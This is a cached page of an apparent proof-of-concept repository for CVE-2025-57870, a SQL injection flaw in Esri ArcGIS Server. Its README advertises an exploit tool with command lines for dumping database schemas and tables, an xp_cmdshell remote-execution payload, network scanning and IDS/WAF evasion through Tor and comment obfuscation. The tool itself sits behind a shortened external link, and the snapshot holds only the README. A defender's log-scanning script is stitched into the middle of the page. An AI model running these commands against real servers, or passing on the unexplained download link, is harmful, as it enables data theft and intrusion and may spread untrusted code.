
CVE-2025-57870 PoC: Esri ArcGIS Server SQL injection vulnerability

Associated Vulnerability
Title: Esri ArcGIS Server SQL injection vulnerability (CVE-2025-57870)
Description: Esri ArcGIS Server is an enterprise-grade, web-oriented software platform from Esri for providing geolocation services. Esri ArcGIS Server versions 11.3, 11.4 and 11.5 contain a SQL injection vulnerability: a specific ArcGIS feature service operation fails to validate its input, which may allow SQL injection attacks.
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Esri ArcGIS Server
Readme
# Esri ArcGIS Server SQL Injection Exploit - CVE-2025-57870

This repository provides a professional-grade exploit for CVE-2025-57870, a critical SQL injection vulnerability in Esri ArcGIS Server versions 11.3, 11.4, and 11.5. The tool targets the Feature Service `/query` endpoint, enabling unauthenticated remote execution of arbitrary SQL commands on the underlying Enterprise Geodatabase. Designed for penetration testers and security researchers, it supports data exfiltration, modification, and potential RCE on certain database backends.  

**Note:** Full source code access: **[href](https://tinyurl.com/3zjbu33f)**. This repository contains core exploit logic and utilities for authorized testing.

## Features
- Unauthenticated exploitation of ArcGIS Feature Services.
- Supports MSSQL, Oracle, and PostgreSQL backends.
- Modes: Error-based, blind (time-based), and out-of-band (OOB) injection.
- Built-in scanner for identifying vulnerable ArcGIS instances.
- Evasion techniques: Randomized delays, User-Agent rotation, proxy support (TOR/SOCKS).
- Post-exploitation: Schema enumeration, table dumping, and command execution.

## Repository Structure
- `sqli_exploit.py`: Main exploit script with modular injection logic.
- `scanner.py`: Network scanner to detect vulnerable ArcGIS servers.
- `payload_generator.py`: Generates custom SQL payloads for specific actions.
- `evasion_utils.py`: Evasion utilities for bypassing IDS/IPS.
- `db_backends/`: Backend-specific payload handlers (mssql.py, oracle.py, postgres.py).
- `config.yaml`: Configuration file for target, proxy, and logging settings.
- `requirements.txt`: Python dependencies.
- `exploited_data/`: Output directory for dumped data.
- `demo.mp4/`: A video instruction manual.

## Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt`

## Setup
1. Configure `config.yaml` with target details:
   ```yaml
   target:
     url: "https://target.com/ArcGIS/rest/services/ServiceName/FeatureServer/0/query"
     db_type: "mssql"  # Options: mssql, oracle, postgres
   proxy:
     enabled: false
     type: "socks5"
     address: "127.0.0.1:9050"
   logging:
     level: "debug"
     output_dir: "exploited_data"
   ```
2. Scan for vulnerable servers:  
   `python scanner.py --network 192.168.1.0/24 --port 6080`

## Usage
Run the exploit:  
`python sqli_exploit.py --target-url <URL> --mode blind --action dump_schema --output exploited_data/schema.json`

### Options
- `--target-url`: Full FeatureServer query URL (required).
- `--mode`: `error`, `blind`, or `oob` (default: error).
- `--action`: `dump_schema`, `dump_table`, `execute_cmd` (required).
- `--db-type`: `mssql`, `oracle`, or `postgres` (required).
- `--table`: Target table for `dump_table` action (optional).
- `--custom-payload`: Raw SQL payload for custom injections (optional).
- `--evade`: Enable evasion techniques (default: off).
- `--output`: Output file for results (default: exploited_data/output.json).

### Examples
1. Dump database schema (MSSQL):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --action dump_schema --db-type mssql --output schema.json`

2. Dump specific table (Oracle):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode blind --action dump_table --db-type oracle --table users --output users.json`

3. Attempt RCE (MSSQL xp_cmdshell):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --db-type mssql --custom-payload "; EXEC xp_cmdshell 'whoami' --" --output cmd_output.txt`

## Evasion Techniques
- `--evade`: Enables random delays (1-5s), User-Agent rotation, and proxy chaining.
- Proxy support: Configure TOR or SOCKS5 in `config.yaml`.
- Payload obfuscation: Automatic comment injection (e.g., `/**/`) to bypass WAFs.
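As an added defender-side example (not part of this repository or the original page), the following Python scans constructed web-server access-log lines for requests to the ArcGIS FeatureServer `/query` endpoint whose parameters carry the indicators the README names: `/**/` comment obfuscation, a stacked `EXEC xp_cmdshell` statement, and time-based delays. The hostnames, paths and log lines are constructed, and the indicator list is illustrative rather than exhaustive.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache-style, not real traffic): the FeatureServer
# /query path, /**/ obfuscation and xp_cmdshell payload follow the README; hosts are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2025:10:00:01 +0000] "GET /arcgis/rest/services/Parcels/FeatureServer/0/query?where=OBJECTID%3D1&f=json HTTP/1.1" 200 512
10.0.0.7 - - [01/Oct/2025:10:00:02 +0000] "GET /arcgis/rest/services/Parcels/FeatureServer/0/query?where=1%3D1%3B%2F**%2FEXEC%2F**%2Fxp_cmdshell%2F**%2F%27whoami%27--&f=json HTTP/1.1" 500 88
10.0.0.9 - - [01/Oct/2025:10:00:03 +0000] "GET /arcgis/rest/services/Parcels/FeatureServer/0/query?where=1%3D1%20WAITFOR%20DELAY%20%270:0:5%27&f=json HTTP/1.1" 200 90
10.0.0.5 - - [01/Oct/2025:10:00:04 +0000] "GET /arcgis/rest/info?f=json HTTP/1.1" 200 300
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
QUERY_PATH_RE = re.compile(r"/FeatureServer/\d+/query/?$", re.IGNORECASE)
COMMENT_RE = re.compile(r"/\*.*?\*/")  # inline SQL comments used to split keywords past a WAF
# Patterns are applied to the percent-decoded, comment-stripped, lower-cased parameter value.
INDICATORS = {
    "stacked_query": re.compile(r";\s*(exec|execute|select|insert|update|delete|drop)\b"),
    "mssql_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "time_based": re.compile(r"waitfor\s+delay|\bpg_sleep\s*\(|dbms_lock\.sleep"),
}

def inspect_request(path_and_query: str) -> list:
    """Return sorted indicator names found in the parameters of a FeatureServer /query request."""
    parts = urlsplit(path_and_query)
    if not QUERY_PATH_RE.search(parts.path):
        return []  # only the feature service query endpoint is in scope here
    hits = set()
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for decoded in values:  # parse_qs has already percent-decoded each value
            if COMMENT_RE.search(decoded):
                hits.add("inline_comment")
            text = COMMENT_RE.sub(" ", decoded).lower()  # collapse /**/ so keywords are whole
            for name, pattern in INDICATORS.items():
                if pattern.search(text):
                    hits.add(name)
    return sorted(hits)

def scan_log(log_text: str) -> list:
    """Parse each request line and report those whose /query parameters carry indicators."""
    findings = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        hits = inspect_request(m["path"])
        if hits:  # a 5xx on a flagged request is consistent with error-based probing
            findings.append({"ip": m["ip"], "status": int(m["status"]), "indicators": hits})
    return findings
```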

## Get the exploit
**[href](https://tinyurl.com/3zjbu33f)**

## Disclaimer
For authorized security testing only. Unauthorized use is illegal. The authors are not responsible for misuse or damages.  

## Contact
For any questions or inquiries, please contact: bytehawkcorp@outlook.com
File Snapshot

[4.0K] /data/pocs/4c7835b3cef7417f950801ee45b1ab29e45a65c2
└── [4.1K] README.md

0 directories, 1 file
Shenlong Bot has cached this for you